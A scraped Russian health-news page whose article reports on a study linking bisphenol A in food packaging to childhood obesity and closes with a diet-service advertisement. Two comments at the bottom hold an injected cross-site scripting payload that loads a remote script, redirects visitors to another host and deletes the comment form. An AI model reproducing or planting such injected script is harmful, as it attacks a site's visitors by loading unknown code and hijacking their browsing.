Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пластик вызывает ожирение  >>  Пластик вызывает ожирение
 
Обратная связь
 

Пластик вызывает ожирение

Размер шрифта
25 ноября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили новый фактор риска развития ожирения, который переворачивает с ног на голову всю концепцию этого повально распространенного недуга.

Пластик вызывает ожирение

Бисфенол А (БФА) – это вещество, которое используется для производства пищевых контейнеров и упаковок. В прошлом было показано, что это соединение может нарушать работу эндокринной системы.

Американское управление по контролю за качеством пищевых продуктов и лекарственных средств (FDA – аналог нашего Роспотребнадзора) запретило использовать БФА при изготовлении детских бутылочек, однако всей остальной посуды этот запрет не коснулся, поскольку нет оснований полагать, что минимальные воздействия этого вещества могут быть опасны для здоровья. Впрочем, исследования этого вопроса далеки от завершения.

В ходе выполнения одной из последних научных работ на эту тему выяснилось, что у детей с высоким содержанием БФА в моче риск развития ожирения в два раза больше, чем у детей с минимальной концентрацией БФА.

Впрочем, эксперты подчеркивают, что причинно-следственный характер этой связи нуждается в дополнительных доказательствах. На данный момент это не более, чем простая закономерность.

«Наше исследование заставляет шире рассматривать саму проблему детского ожирения», – заявляет Леонардо Трасанде, доцент отделения педиатрии Нью-Йоркского университета. «Зачастую мы считаем, что единственные значимые факторы – это нездоровое питание и дефицит двигательной активности, однако влияние внешней среды ни в коем случае нельзя сбрасывать со счетов».

Трасанде и его коллеги оценили уровень БФА в моче у примерно 3 000 детей и подростков в возрасте от шести до девятнадцати лет, что позволяет интерпретировать данные результаты как достоверные.

Какой же вывод из всего этого должны сделать родители?

«Мы знаем, что основной источник БФА – это различные пищевые контейнеры и емкости», – говорит Трасанде. «Поэтому лучше покупать свежие фрукты и овощи, это позволит ограничить воздействие БФА на организм. Возможности современного рынка и финансовый достаток большинства граждан вполне позволяют придерживаться правил здорового питания».

Отдельно стоит упомянуть сладкую газировку, которую так любят дети и подростки. Мало того, что эти напитки представляют собой целый ворох абсолютно «пустых» калорий, так еще и поставляются они в емкостях с БФА!

«Старайтесь избегать любые алюминиевые и пластиковые контейнеры», – вновь и вновь увещевают эксперты.

Ну а если вы хотите худеть, несмотря на пластик и другие обстоятельства, то специально для вас создана «Диета Елены Малышевой»! Уже готовая правильная еда в правильной упаковке будет доставлена вам в любое место и время! Вам останется только есть и худеть! Заказывайте прямо сейчас!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:52

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:51

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции! 11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.